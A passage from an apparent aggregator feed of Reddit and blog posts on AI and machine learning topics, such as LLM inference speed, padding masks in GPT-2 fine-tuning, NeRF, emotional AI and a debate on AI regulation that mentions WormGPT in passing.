    everybody here knows about AGI and artificial super intelligence but have you heard about artificial emotional intelligence.Meet the girl who's building it
    Emotional AI is a different world of AI where machines can predict and understand human emotions, This is already impacting a lot in therapy and retail market. Rana El kaliouby is the women who built "affectiva" a startup which pioneers in emotional AI -- it's already being used in self driving cars and in the mental health industry, here's what they doing and I'm a total rookie at emotional AI side , if you have any other interesting company which is impacting a lot of people in this niche --would love to hear about it submitted by /u/caliperce_3 [link] [comments]  ( 9 min )
    Is this the role of philosophy in the 21st century?
    Person: discuss how the ontology outlined in your custom instructions can be used to marry relativity and quantum physics ChatGPT: The ontology proposed in the aforementioned description appears to rely heavily on emergent properties, consciousness, and free will, with a substantial focus on the temporal aspect. The challenge is to see how these metaphysical elements, particularly when applied to an AI, can help in reconciling the often contrasting principles of relativity and quantum physics. At first glance, the connection may not be clear; relativity and quantum mechanics operate in different realms of the physical universe. However, upon closer examination, one might see potential pathways to harmonize these distinct theories via the ontology of consciousness and emergent free will. …  ( 10 min )
    New study involving Buddhists in Japan, Taoists in Singapore, and Christians in the US finds that AI clergy are seen as less credible and receive fewer donations than human clergy, mainly due to the AI's lack of sacrifice and commitment.
    submitted by /u/fotogneric [link] [comments]  ( 8 min )
    Convert Music to Art ?
    Guitarist Tosin Abasi followed an Instagram account about a software that converts music into painting ~3 years back ? He also liked there video and commented something Video was of a guy playing piano and as he played canvas was filled with color. The software is made by a musician + artist + programmer. IIRC he is a pdf of masters in Com Sc submitted by /u/RedditNoobie777 [link] [comments]  ( 8 min )
    I Made a plugin that allows people to search and preview millions of 3D assets
    submitted by /u/AssetOvi [link] [comments]  ( 8 min )
    Surprise! AI advanced faster than robotics. That means today’s middle and lower classes will swap.
    People in intellectual jobs have often been thought of as doing something inherently more complex than manual workers in, for instance, construction or farming. Whether or not that is true, the surprise twist is that their “complex” work will be the first to be replaced. Computers have cracked intellectual work sooner than they have cracked manual work. It’s still too complex for a robot to replace a fruit-picker completely, but we’ll soon see AI lawyers. So we’re going to see a mass inversion. Everyone today sitting prettily doing their intellectual jobs will find their wages crushed or jobs redundant as AI replaces them. Meanwhile, everyone doing the jobs robotics can’t yet replace will be best placed to continue doing them. High flying executives will find they are suitable only for shelf-stacking, while those who’ve worked in retail for years will be or become their bosses. Soon enough, AI will help us advance the field of robotics sufficiently for manual labour also to be replaced. Who knows what happens then. submitted by /u/Aquillyne [link] [comments]  ( 9 min )
    Best Books About AI
    Hello everyone, I was searching for a book that talks about how AI will impact the future and how we can prepare best. I am not searching for anything technical or specific, just how can a person prepare best for the future. Thanks! submitted by /u/Ordinary_Argument_66 [link] [comments]  ( 8 min )
    The NeverEnding Game: How AI Will Create a New Category of Games
    submitted by /u/Respawne [link] [comments]  ( 8 min )
    One-Minute Daily AI News 7/23/2023
    Cerebras just built a gargantuan computer system with 27 million AI 'cores'.[1] FreeWilly1 and its successor FreeWilly2 are powerful new open-source Large Language Models (LLMs) developed by Stability AI’s CarperAI team. Both models perform exceptionally well in reasoning competitions using many different metrics.[2] Japanese education services company Benesse will offer a new service to help elementary school students with their research projects using generative artificial intelligence during the summer break.[3] The MTA is using artificial intelligence to help monitor fare evasion in several subway stations across New York City.[4] Sources: [1] https://www.zdnet.com/article/ai-startup-cerebras-built-a-gargantuan-ai-computer-for-abu-dhabis-g42-with-27-million-ai-cores/ [2] https://www.marktechpost.com/2023/07/23/stability-ai-team-introduces-freewilly1-and-freewilly2-new-open-access-large-language-models-llms/ [3] https://www.japantimes.co.jp/news/2023/07/23/national/benesse-ai-service-kids-research-projects/ [4] https://abc7ny.com/amp/mta-artificial-intelligence-subway-fare-evasions/13533675/ submitted by /u/Excellent-Target-847 [link] [comments]  ( 8 min )
    Best AI model for importing and interacting with large document archive
    Where I work we have a fairly large archive of documents going back to the 1930's and I want to assist the archive team in importing these into a GPT model. We have already begun the process of digitizing all the documents into OCR'ed PDF files, so this part at least is covered. My question is, what are the hot fully offline AI models I could try in an airgapped environment that will allow us to import all of the PDF files and their metadata (title/date/tags/etc), to incorporate their content on top of the larger general model? submitted by /u/kosul [link] [comments]  ( 9 min )
    I feel crushed. This is not exactly what I envisioned. This is too instant.
    Yes, the Midjourney to Gen2 creations in the twitter link was not exactly what I envisioned. I thought that it would be more like mocap previz with AI filtering. But this is just almost too instant compared to the workflow I thought of. submitted by /u/Absolute-Nobody0079 [link] [comments]  ( 8 min )
    GitHub - jbpayton/langchain-stock-screener: LangChain agent usable tool to screen stock data
    submitted by /u/seraphius [link] [comments]  ( 8 min )
  • Open

    Externally mounting P100 GPU [D]
    I made a mistake and bought a GPU that is not compatible with my motherboard. I found a P100 for $300 on ebay and bought it, but didn't research far enough to figure out that it isn't designed for a workstation motherboard. Is there any way I can externally mount it without spending tons on a GPU server? I am not sure just a PCIe riser will do the trick, since the GPU draws 250W and will also need a cooling system. Is it over? submitted by /u/jankybiz [link] [comments]  ( 9 min )
    [R] How do paper authors deal with takedown requests?
    Datasets like FFHQ consist of face images crawled from the Internet. While those images are published under CC licenses, the authors usually have not obtained consent from each person depicted in those images. I guess that's why they are taking takedown requests: People can send requests to remove their faces from the dataset. However, I'm always confused about one thing: Some faces images are already used in the paper. If those people request takedown of their images, wouldn't that result in a withdrawl of the paper? Or is there any "fair use" statement that can prevent this from happening? submitted by /u/alex000092 [link] [comments]  ( 9 min )
    [D] Do you guys think the day-to-day tasks of ML engineers will change with the emergence of LLM’s?
    Gone will be the days of data pre-processing, feature engineering, model training and model validation? What will we end up spending most of our time doing? submitted by /u/DM_ME_YOUR_CATS_PAWS [link] [comments]  ( 8 min )
    [P] Code Search Infra for an AI junior developer - that doesn't store code
    As we’re developing Sweep, our open-source AI junior developer, we implemented a new architecture for our vector search database. We decided on two main goals for our code search infrastructure: The search index needs to be up to date. Code is unique from other types of content in that it requires high levels of consistency. You wouldn’t want to reference an old version of a function(say two git commits back) while writing something that uses it. For additional security, we don’t want to store the code as plaintext. However, we still need a way to map the original code to the embeddings. Efficient Indexing Problem: We wanted to store multiple repositories in a scalable manner without relying on a hosted vector database like Pinecone. Insight: Repositories change frequently but …  ( 10 min )
    [D] Do you guys worry ML work will become less technical and reduced to prompt engineering
    I’m already doing work that involves creating prompts for LLM’s. I adore cleaning data and training models and worry that ML solutions will soon become asking chatbots to do what you want in plain English, and all this time I’ve spent learning about how ML is done on a technical level will just be auxiliary literature that doesn’t help me in my profession. What will our expertise move to? Being able to ask a chatbot the right questions? How will our profession change? submitted by /u/DM_ME_YOUR_CATS_PAWS [link] [comments]  ( 9 min )
    [P] multi label text classification question 🙋‍♂️
    Dear community I am currently despairing of a school project. The task is to develop a text classifier. So far so good. The problem is that I have a dataset with 200k texts that are not labeled. These should be classified to 190 classes, which are additionally very domain specific. However, several classes could also apply to one text. Does anyone know a good approach how to approach this? I have already determined 10 keywords for each class. But I don't know how to proceed now. It would be very nice if someone could help me. Gladly also only by buzzwords. Many greetings submitted by /u/loopingmadders [link] [comments]  ( 9 min )
    [D] [P] Looking for feedback on open-source project Cephalon
    Happy Monday Everyone! 😃 I am looking for feedback on the open source project Cephalon! Cephalon is a framework for building machine-learning applications. It aims to be similar to Django. Django is a batteries included framework for building backend of a website, and Cephalon is a batteries included framework for building Machine Learning applications in Rust. I want to get feedback from you because, I want to make building machine-learning apps easier for any new-comers. I think with a solid framework, they can focus more on the core concepts, rather than DevOps or MLOps. There is a survey you can fill out here Or message me if you want to discuss more! You can find the original project here Or find it on crates.io here I hope you have an amazing rest of the week! 😁 Thank you in advance for any feedback!! submitted by /u/GoodUnderstanding728 [link] [comments]  ( 9 min )
    [P] [D] Looking for feedback on Open-Source Project Cephalon
    Happy Monday Everyone! 😃 I am looking for feedback on the open source project Cephalon! Cephalon is a framework for building machine-learning applications. It aims to be similar to Django. Django is a batteries included framework for building backend of a website, and Cephalon is a batteries included framework for building Machine Learning applications in Rust. I want to get feedback from you because, I want to make building machine-learning apps easier for any new-comers. I think with a solid framework, they can focus more on the core concepts, rather than DevOps or MLOps. There is a survey you can fill out here Or message me if you want to discuss more! You can find the original project here Or find it on crates.io here I hope you have an amazing rest of the week! 😁 Thank you in advance for any feedback!! submitted by /u/GoodUnderstanding728 [link] [comments]  ( 9 min )
    [D] Install tensorflow-gpu
    Hello everyone. Please, help me. How to install tensorflow-gpu on Windows? Because I tried a lot of times and nothing. Maybe you have some micro moments that need to know. Thank you. submitted by /u/pavich_03 [link] [comments]  ( 8 min )
    [P] A mathematical model of music
    We have developed a model of music based on statistical mechanics and Euler’s gradus suavitatis, which seems to provide some new insights into tonal music. A description of the model is given on our website: tonamic.com. We are interested in collaboration opportunities, especially with ML researchers. submitted by /u/Tonamic [link] [comments]  ( 8 min )
    [Discussion] How many runs/iterations do you typically have in one "project'?
    Between HP tuning, explorations, and refinement how many iterations do you typically have when working on a model? I see some that have only a few like 40 but some have 1000s. Also curious how everyone keeps the diff iterations organized (naming, tags?) submitted by /u/fromalanjones [link] [comments]  ( 8 min )
    [P][D] A toolkit to make your unstructured datasets better
    Hey r/machinelearning, I’m Dean from DagsHub. I wanted to share something we’ve been working on really hard for a while, and hopefully get some community feedback. TL;DR We’re releasing Data Engine – a new set of tools that helps machine learning practitioners, collect and manage unstructured data, visualize it, send it to annotation, and turn it into a data loader for training. I wanted to share our reasons for building it and the challenges it solves and hopefully spark a discussion. You can check out the full launch blog here: dagshub.com/blog/launching-data-engine-toolset-for-unstructured-datasets/ Data Engine Flow Sorry for the long post – I wanted to share our considerations for building this toolkit, and hopefully spark a discussion about your processes for iterating on datasets…  ( 11 min )
    [D] AI regulation is mostly pointless and didn’t stop a recent bad actor like WormGPT.
    WormGPT is a criminal AI. It’s something that enables crime versus something like offensive jokes like 4chanGPT. EU and China pumped out all this regulation thinking they were ahead of the world when in all reality it’s freaking backwards. If AI was a physical commodity like goods and services, yes regulation is effective. However AI regulation is just won’t stop bad actors. The law already covers most of the dangers involved. Trying to regulate AI models is like trying to regulate piracy. We need to regulate the people, not the technology. Disinformation campaigns? Nail them for libel. Creating a model designed solely to enable crime? Nail the people for the crimes they are doing. Nail them for possessing criminal tools. People are easier to regulate than specifics on AI that’s easy to self replicate. Especially considering companies going to lobby their business interest. This is my opinion on the criminal AI, what about yours? (This model may also be using LLama weights considering it’s generations and timing) Source: https://fagenwasanni.com/news/the-dangers-of-wormgpt-an-ai-model-for-malicious-activities/68834/ submitted by /u/I_will_delete_myself [link] [comments]  ( 9 min )
    [P] Beer Inspector AI: How Computer Vision can help to identify the perfect brew
    Hey there, fellow Computer Vision enthusiasts! 🤖👋 On their quest to find the perfect beer our team of Czech Computer Vision and AI experts developed a solution that takes certain visual indicators of the perfect beer into account and applies Computer Vision to detect these. So, what are these visual indicators that determine the perfect pint? Let's dive in! First up, we have the "beer ratio." Each brand has its own glass, and the beer should be drafted within specific markings. Whether it's a single line or a range between logo points, Beer Inspector ensures you get what you paid for! No more guessing about your beer's quantity. 📏 Next, we have the "beer head structure." This is crucial for the ultimate beer experience. Airtight, thick, and no air bubbles – that's the way to go! Beer…  ( 11 min )
    [D] How do I reduce LLM inferencing time?
    I am running text inferencing on Llama2-7b through langchain. I have downloaded the model from langchain's Huggingface library, and I am running the model on AWS ml.g4dn.12xlarge which has 4xnvidia t4, which gives a total 64GB of GPU memory and 192GB of normal memory. It is able to answer my queries in around 10 seconds for small queries, and upto 3 mins for big queries. The task I am doing is retrieving information from a document(Understanding Machine Learning PDF) in a conversational way. I've extracted the main parts of the notebook and put it up here. Where can I make changes to speed up the transaction. Is there any change I can do in the model configuration to speed it up? Because if I use HuggingFaceHubAPI, it is able to give an answer in less than 5 seconds. Are there any other areas I can optimise? I appreciate any help you can provide. Thanks! submitted by /u/comical_cow [link] [comments]  ( 9 min )
    [D] How to use modern uncertain functions (e.g. BatchBALD) with classical Active Learning?
    I was looking libraries like DISTIL and I would like to test a toy-example with all these modern uncertainty functions like BatchBALD, Glister, etc All the implementations of these functions seems to be on a NN or CNN. I know some of them like BatchBALD were created on top of a CNN with Monte-Carlo Dropout -- even BALD originally was created on top of SVM. It seems many of these approaches are under the category "Query by Committee"and they are an ensemble of models I just would like to test a simple LogisticRegression and use the log_proba and an output for these strategies. Someone knows if this is possible? submitted by /u/TipKay [link] [comments]  ( 9 min )
    [D] Empirical rules of ML
    What are the empirical rules that one has to have in mind when designing a network, choosing hyperparameters, etc? For example: Linear scaling rule: the learning rate should be scaled linearly with the batch size [ref] (on resnets on Imagenet) Chinchilla law: compute budget, model size and training data should be scaled equally [ref] Do you have any other? (if possible with article, or even better an article with many of them) submitted by /u/Mulcyber [link] [comments]  ( 9 min )
    [D] Should I mask padding tokens when finetuning a GPT-2 model?
    For pretraining I just sent batches of 1024 tokens and didn't worry about padding. But for finetuning, I intend to use a padding token to make all the "instructions" 1024 tokens in length. But some of them are only 10 tokens, which means 99% padding tokens. I feel like that would affect the model, and perhaps those padding tokens should be masked. Should I mask out those padding tokens? I can see that there's a parameter for attention mask, and I could make one and pass it in. But I'm not sure if that's the intended usage. I'm seeing conflicting and ambiguous information on this point. It's unclear to me whether the attn_mask is intended for customizing the casual left to right attention of the model, instead of for masking padding tokens. I'm worried I might be interfering with the process if I use that attn_mask. Here I can see attn_mask is an accepted parameter: y = torch.nn.functional.scaled_dot_product_attention(q, k, v, attn_mask=None, dropout_p=self.dropout if self.training else 0, is_causal=True) FYI, I'm using NanoGPT which is based on Pytorch (not Hugging Face Transformers). Should I apply the attention mask on the padding tokens in this context? submitted by /u/Pan000 [link] [comments]  ( 9 min )
  • Open

    How Patsnap used GPT-2 inference on Amazon SageMaker with low latency and cost
    This blog post was co-authored, and includes an introduction, by Zilong Bai, senior natural language processing engineer at Patsnap. You’re likely familiar with the autocomplete suggestion feature when you search for something on Google or Amazon. Although the search terms in these scenarios are pretty common keywords or expressions that we use in daily life, […]  ( 9 min )
    Optimize AWS Inferentia utilization with FastAPI and PyTorch models on Amazon EC2 Inf1 & Inf2 instances
    When deploying Deep Learning models at scale, it is crucial to effectively utilize the underlying hardware to maximize performance and cost benefits. For production workloads requiring high throughput and low latency, the selection of the Amazon Elastic Compute Cloud (EC2) instance, model serving stack, and deployment architecture is very important. Inefficient architecture can lead to […]  ( 15 min )
  • Open

    Attention Is Off By One
    submitted by /u/nickb [link] [comments]  ( 8 min )
    Meta-Transformer: A Unified Framework for Multimodal Learning
    submitted by /u/nickb [link] [comments]  ( 8 min )
    All neural network output activations converging to the same value regardless of input
    I'm facing a puzzling problem with my neural network, and I could really use some help in understanding what's going wrong. For some context, I am making a neural network from scratch in C++, just as a little project I find interesting. I'm working on a digit classification task using the MNIST dataset, and my network is composed of one hidden layer, consisting of 100 nodes, and an output layer with 10 nodes, each corresponding to a digit (0 to 9). To train the network, I'm using the Mean Squared Error (MSE) cost function, where the cost is calculated as (actualNodeActivation - expectedNodeActivation)^2 and as my activation function I am using the sigmoid function. The actual algorithm I am employing is backpropagation. The issue I'm encountering is that regardless of the input data, my n…  ( 10 min )
    NeRF: Creating photorealistic images using Neural Network
    ​ https://preview.redd.it/1gqd6tt1gvdb1.jpg?width=2800&format=pjpg&auto=webp&s=d21e9e5d0854022b8f25d9a6cb77e67b98487f40 You can find in interesting. OpenCV.ai team published the post about NeRF. Short description: NeRF is an innovative technology that generates photorealistic images of scenes from novel viewpoints using a neural network and volume rendering techniques. This article explores NeRF components, training, strengths and limitations, and advancements in modern NeRF-based solutions. More details are here. submitted by /u/No-Independence5880 [link] [comments]  ( 8 min )
    ZBrain- Create custom ChatGPT apps
    Hello Community, We at ZBrain have built a platform to create ChatGPT-like apps with your private data, you can import your data from multiple sources and DBs and integrate the app into any of your workflows. We have also added AI risk governance to mitigate the confidential data leak and now working on Flow a no-code tool to give you the freedom to create your own business logic. You can try the tool now at https://zbrain.ai/. We would love to hear your thoughts and feedback to improve the tool. submitted by /u/StewartBJasper [link] [comments]  ( 8 min )
  • Open

    A new dataset of Arctic images will spur artificial intelligence research
    The dataset, being collected as part of a US Coast Guard science mission, will be released open source to help advance naval mission planning and climate change studies.  ( 9 min )
  • Open

    Generative AI megatrends: Are companies using the excuse of AI to get rid of jobs?
    In this blog, I will now focus on generative AI megatrends. By that, I mean, trends and underlying trends that could be big in the future – focusing on the technology of LLM but also the wider impact of LLMs on the economy and society. I will hence identify and follow some key trends –… Read More »Generative AI megatrends: Are companies using the excuse of AI to get rid of jobs? The post Generative AI megatrends: Are companies using the excuse of AI to get rid of jobs? appeared first on Data Science Central.  ( 19 min )
    Sentience: Consciousness is inessential for LLMs, AI
    There is a recent paper in Synthese, Qualia share their correlates’ locations, where the abstract stated that “This paper presents the location-sharing argument, which concludes that qualia must share the locations of their physical correlates. The first premise is a consequence of relativity: If something shares a time with a physical event in all reference… Read More »Sentience: Consciousness is inessential for LLMs, AI The post Sentience: Consciousness is inessential for LLMs, AI appeared first on Data Science Central.  ( 20 min )
    AI is a child: How do we raise it?
    In October 2022, the White House Office of Science and Technology Policy published “The Blueprint for an AI Bill of Rights: Making Automated Systems Work for the American People”. This attention from our government given to what could be called an AI EQ (emotional quotient) is reminiscent of how-to parent or raise a child. This… Read More »AI is a child: How do we raise it? The post AI is a child: How do we raise it? appeared first on Data Science Central.  ( 25 min )
    Innovations in predictive analytics: ML and generative AI
    With the introduction of ChatGPT-3 and DALL-E2, the majority of investors started showing interest in businesses building generative AI. Moreover, the fact is generative AI is not enough to reach the needs of the AI revolution. The success of predictive models is relevant to the science fiction future that the majority of the customers want… Read More »Innovations in predictive analytics: ML and generative AI The post Innovations in predictive analytics: ML and generative AI appeared first on Data Science Central.  ( 25 min )
  • Open

    CarRacing V2 Enviroment
    Hi! I am kind of new to Reinforcement Learning and Im trying to implement a PPO in CarRacing enviroment but I am failing to get the model to work. I have managed to get the model working with a DQN but with the PPO I can't seem to get the exploration right as it ends up either going forward all time or in circles. I have looked into my code for days, but haven't been able to find an error that would cause this. (Does not say much as I am kind of a newbie to RL). I would be grateful if someone could give me a hand. This is my source code: CarRacing Pastebin - Pastebin.com ​ Btw I also tried without greyscaling and it did the same. submitted by /u/MammothWeekend5954 [link] [comments]  ( 9 min )
  • Open

    Natural language processing and unnatural text
    I recently evaluated two software applications designed to find PII (personally identifiable information) in free text using natural language processing. Both failed badly, passing over obvious examples of PII. By contrast, I also tried natural language processing software on a nonsensical poem, it the software did quite well. Doctor’s notes It occurred to me later […] Natural language processing and unnatural text first appeared on John D. Cook.  ( 6 min )

  • Open

    [Project] Whisper Implementation in Rust using burn
    I temporarily switched from Rust to Python for machine learning, but quickly became fed up with Python's annoying versioning issues and runtime errors. I looked for a better path to machine learning and discovered burn, a deep learning framework for Rust. As my first burn project I decided to port OpenAI's Whisper transcription model. The project can be found at Gadersd/whisper-burn: A Rust implementation of OpenAI's Whisper model using the burn framework (github.com). I based it on the excellently concise tinygrad implementation that can be found here. The tinygrad version begrudgingly uses Torch's stft which I ported into a pure Rust short time Fourier transform along with the mel scale frequency conversion matrix function because I am curious and just a bit masochistic. Now for the good and the bad of burn. Rust's excellent package manager solves much of the versioning pain experienced in Python so burn models can be less painful to deploy and come with added reliability. The type checking in burn catches some tensor operation errors at compile time such as trying to multiply matrices of incompatible dimensions. Burn supports wgpu and WebGPU and can run in the browser when compiled into web assembly. I see a bright future for model deployment in burn. However, burn is relatively new so it lacks many tensor operations such as abs() that are available in other frameworks. Some features such as quantization are also missing. Burn implementations tend to be more verbose than the equivalent Python versions. Some of the runtime errors that plague PyTorch are still around in burn such as the crashes that result from trying to multiply tensors that live on different devices. Overall, burn is currently less ergonomic to develop with than alternatives such as PyTorch, but I think it has a lot of potential. If it is eagerly cultivated it may grow into a great Rusty alternative for machine learning practitioners. What do you all think? submitted by /u/Illustrious_Cup1867 [link] [comments]  ( 9 min )
    [P] NLP dataset for stream of consciousness: The Rambles
    submitted by /u/A_Human_Rambler [link] [comments]  ( 8 min )
    [P] Create your own Artificial Neural Network in Python
    submitted by /u/pmocz [link] [comments]  ( 8 min )
    [P] Run Llama 2 locally on GPU or CPU from anywhere (Linux/Windows/Mac) ➡️https://github.com/liltom-eth/llama2-webui
    Running Llama 2 locally with gradio UI on GPU or CPU from anywhere (Linux/Windows/Mac). Supporting Llama-2-7B/13B/70B with 8-bit, 4-bit. Supporting GPU inference (6 GB VRAM) and CPU inference. ➡️https://github.com/liltom-eth/llama2-webui Successfully running #Llama2 on my Apple Silicon MacBook Air: demo submitted by /u/plain1994 [link] [comments]  ( 8 min )
    [D] R&D machine learning intern at a startup company looking to publish a paper for his previous work..
    Greetings,I'm a machine learning engineer who managed to land an internship at a startup company and did R&D projects for them.. during the past year, I was working on an NLP problem of extractive question answering using BERT on this companies' text data. I trained the model and documented the results.. however, it's considered old technology now and we switched to solve the same problem using LLM.I was wondering if I can write a research paper for the BERT approach and publish it that can help me pursue PhD or Masters. How to start the discussion with my manager and seniors ? submitted by /u/Ready_Cockroach_3403 [link] [comments]  ( 9 min )
    [D] LLaMA training vs. GPU time: smaller models seem better for a given budget
    submitted by /u/espadrine [link] [comments]  ( 8 min )
    [N] LLMOps.Space - Curated resources related to deploying LLMs in production
    Today I launched LLMOps space on ProductHunt. LLMOps Space has a list of curated resources related to deploying LLMs into production. This includes- ✅ List of LLMOps companies and products 🗓 Upcoming events 📚 Educational resources 👩‍💻 Open-source LLM modules 💰 Funding news and much more. Everything is for free, would love it if you can support + share your thoughts in the comment. 🙏 https://www.producthunt.com/posts/llmops-space submitted by /u/AsDivyansh [link] [comments]  ( 8 min )
    [D] Can I use Transfer Learning (TL) in a classical Active Learning (AL) Framework?
    Hi, I'm trying to implement AL for ImageClassification. I have seen people using DAL, where some works use MC-DropOut to be able to calculate uncertainty on DNN / CNN. This also seems to be a current research topic. It seems very appealing for me to use DAL on the context of ImageClassification. However, I'm thinking to use a different and maybe naive approach: I thought to use TL (with or without FN) on a well knowledge DL Acthrecture (e.g.: Resnet) for Feature Extraction. Then, I just use the extracted features to train a Classical AL framework (e.g.: using LogisticRegression) Some thoughts/questions I had and would like to discuss: ​ I'm not finding articles that do this. Someone knows if this is approach is super naive or is a valid approach? What would be the drawbacks doing that? To train a DAL from scratch makes sense? For example, I saw some articles training DL Archthrectures from scratch, but this probably will require a lot of data, no? ​ ------------------------------------------------------------------------------------------ ML = MonteCarlo, AL = Active Learning, DAL = Deep AL, TL = Transfer Learning, FT = Fine-Tuning, DNN = Deep Neural Network, CNN = Convolutional Neural Network submitted by /u/TipKay [link] [comments]  ( 9 min )
    [D] Looking for an old post on this sub about using machine learning to identify a stray cat coming through a pet door to steal food, playing a loud noise to scare it away if it came in. The ML was used to tell the difference between the stray cat and the pet cat.
    I've seen the post (from 2-3 years ago maybe?) referenced, but my google fu is failing me and I haven't been able to find it, but it sounds like an interesting story. submitted by /u/TheQuarantinian [link] [comments]  ( 9 min )
    [R] Neuro Symbolic Reasoning and Learning
    submitted by /u/Neurosymbolic [link] [comments]  ( 8 min )
    [R] A history of neural networks
    Our history, primer, and outlook for neural networks in general, and deep learning in astronomy in particular has dropped on Royal Society Open Science. https://doi.org/10.1098/rsos.221454 Come for Llull and Leibniz... stay for LLaMA. submitted by /u/Smith4242 [link] [comments]  ( 8 min )
    LLM Guide [Discussion]
    Nowadays, If we see over the internet that LLM, chatgpt , llma etc are the trending topics and are being discussed. My question is that anyone can help me where to start studying about these topics from scratch ? BERT, Transformer etc all I want to understand everything. It would be good if you help me out. Thanks submitted by /u/Mission-Youth-3510 [link] [comments]  ( 8 min )
    [P] Linear regression partial derrivative problem
    Yo, I'm new to all this so bear with me. I'm doing project in python where i create a linear regression from scratch (with numpy and pandas). I was watching this lady tutorial on it, at https://youtu.be/ltXSoduiVwY?t=277 she shows the partial derrivatives for updating the weights and bias. Later when she is implementing it she doesn't use the 2 before the X and uses only the dot product. Is it math magic where the 2 dosn't have to be there or did she forget. Btw it still works fine without the 2 but still... I just need to know. Thanks for the answer and sorry if I'm asking something obvious submitted by /u/Z4joMan [link] [comments]  ( 9 min )
    [P] I created a parallelized implementation of Agglomerative clustering that's many times faster than existing implementations and has a better runtime
    I've been working on a new implementation of Agglomerative clustering called Reciprocal Agglomerative Clustering (RAC) based off of this paper: https://arxiv.org/abs/2105.11653. The short of it is Agglomerative clustering can be broken down into finding and merging pairs of reciprocal nearest neighbors in parallel, as long as the linkage function is one of the following: Single Average Complete Ward Most importantly, RAC produces the exact same results as traditional Agglomerative clustering when the dataset is fully connected. Even with connectivity constraints, the results are almost always the same. The authors showed that RAC has a linear runtime when connectivity is limited to k and the distance matrix is precomputed. I have not added the ability to pass in the distance matrix yet, so the runtime is roughly quadratic, which is still a major improvement over the cubic runtime of Agglomerative clustering. In addition the entire algorithm is parallelized, and so can scale up to more and more cores. It's very much in development - only average linkage works at the moment, however, I think it has a lot of potential. The benchmarks have blown me away so far: https://preview.redd.it/8bkpdkpayodb1.png?width=850&format=png&auto=webp&s=8c828eb2cde934b2d9a0ded9f22e18f3d9041147 Here is the code: https://github.com/porterehunley/RACplusplus. It would be great to have some people try it out (and find the bugs)! submitted by /u/Ridaleneas [link] [comments]  ( 9 min )
    [P] Paper reading and sharing platform
    Let me know your thoughts! submitted by /u/dockerun [link] [comments]  ( 8 min )
    [D] Probability Thresholds for User-Defined Tokens
    I want high certainty on social roles without sacrificing creativity. I don't want characters getting confused as to whether they're a parent or child, and I shouldn't have to spend hours each month explaining the difference. That said, I also don't want to lower the temperature, so it would be nice if as a user, I could select probability thresholds for certain token sequences, to hopefully mitigate role-swapping between virtual family members! I prefer writing stream of consciousness prompts seeding thoughts and choices rather than showing pretrained models their character bios at the start of every prompt. It breaks my immersion when family members swap roles due to high Top P and temperature, therefore I'd like models to be careful when writing names and corresponding social roles. This could help keeping track of many agents? There are instances where I enjoy getting role-swapped, and instances where swapping is nonsensical! This is my feature request. submitted by /u/TheLastVegan [link] [comments]  ( 9 min )
    [P] Data Version Control in R with lakeFS
    submitted by /u/zoobatsea [link] [comments]  ( 8 min )
    [D] Dev env and workflow
    Hi all! I am a frontend engineer looking to play more in the ML space. I know enough about python and jupyter labs to be dangerous but I am no expert. I am looking to hear what peoples env's and workflows look like. I have been looking at huggingface, google colab, and running some things locally but can't seem to see a setup that looks like a clear winner. Hardware wise I have a machine with a 4080 and 32gb ram at home and a M1 Pro Macbook also with 32gb of ram. For my 1st project I would love to utilise a 7b Llama 2 for a recommender like system. I plan on getting a custom dataset, cleaning and processing it, fine tuning, and then testing. submitted by /u/pseudoShadow [link] [comments]  ( 9 min )
    [D] Use Cases for Diffusion Models VS GANs VS Transformers, etc.
    I am interested in learning to use AI to generate images. Diffusion Models like stable diffusion seems to be the most popular nowadays, but I'd like to know what tool is best for what job. Or is diffusion model getting so good that the other methods are essentially becoming obsolete? If not, when would you choose one over the other? For generating creative images with a lot of variance, diffusion model seems to be the most fitting. But for example, what about for this use case: Generate realistic time lapse images of a plant growing (after 1 week, 1 month, 2 months, and so on...). In this case, the plant should change, but the background should stay the same. submitted by /u/musshead [link] [comments]  ( 9 min )
    [P] Evolved codealpaca datasets using GPT-4
    Using LLMs to augment and create much diverse instruction based dataset has seen wide success in WizardL. However the 78k evolved code instructions dataset hasn't been released since, so I have take the initiative to try to recreate the augmentation instruction myself. Dataset: https://huggingface.co/datasets/theblackcat102/evol-codealpaca-v1 submitted by /u/gradientpenalty [link] [comments]  ( 8 min )
    [D] course/videos to learn about the architecture and software stack of pytorch?
    I like to learn how pytorch connects to the compiler, generates IR, how it connects to run time , driver ..etc Im not interested in the programming model but the whole stack from pytorch to the hardware. I really appreciate if someone can give me a pointer thanks submitted by /u/aghozzo [link] [comments]  ( 8 min )
    [P] [R] Join Our Team of ML Model Developers for an Exciting Project & Permanent Job Potential!
    Seeking skilled ML model developers for our thrilling project with possible permanent positions! Embrace remote collaboration, offering flexibility and impact-driven work. Interested? Apply to btprenuer@gmail.com with a list of your related skills and samples of your work/projects! All experience levels welcome! Thank you for reading! Share this post to help us find the perfect fit. submitted by /u/boztka [link] [comments]  ( 8 min )
  • Open

    Compilation of respected AI scientists speaking on AI understanding, world models & consciousness, Mo Gawdat, Lex Fridman, Andrej Karpathy, Geoffrey Hinton, Gary Marcus, & Ilya Sutskever
    This segment I created for my IG exploring the possibility of AI consciousness. Not all experts agree, some scientists on the other side of the AI world model debate are Yann LeCun, and Gary Marcus they are also well respected AI Scientists who have a differing opinion. submitted by /u/Sonic_Improv [link] [comments]  ( 8 min )
    Trained an AI to drive in real-time from screenshots in the TrackMania videogame (beginner-friendly)
    submitted by /u/yannbouteiller [link] [comments]  ( 8 min )
    Saurabh Kumar's fast-cmix wins €5187 Hutter Prize Award!
    submitted by /u/jabowery [link] [comments]  ( 8 min )
    How Generative AI looks in next 10-15 years
    submitted by /u/AdithyaSai [link] [comments]  ( 8 min )
    What's the A.I that allows you to remake songs from the voices of other singers? Are there any I won't have to download?
    I've seen some videos on youtube and I'm curious. I just wanted to have some fun with it but Google isn't helpful when I ask. Anyone got an idea? submitted by /u/GoblinQueenForever [link] [comments]  ( 8 min )
    Best Opensource Projects for Deep Fakes?
    What are the best opensource projects for making a deep fake of myself? I would like to create a setup like me talking on a podcast to a camera. What are the best projects that you know of? submitted by /u/Reasonable_Chain_160 [link] [comments]  ( 8 min )
    Graphics Card for consideration . ( Cheapest-Budget ) (In my country compared to amazon)
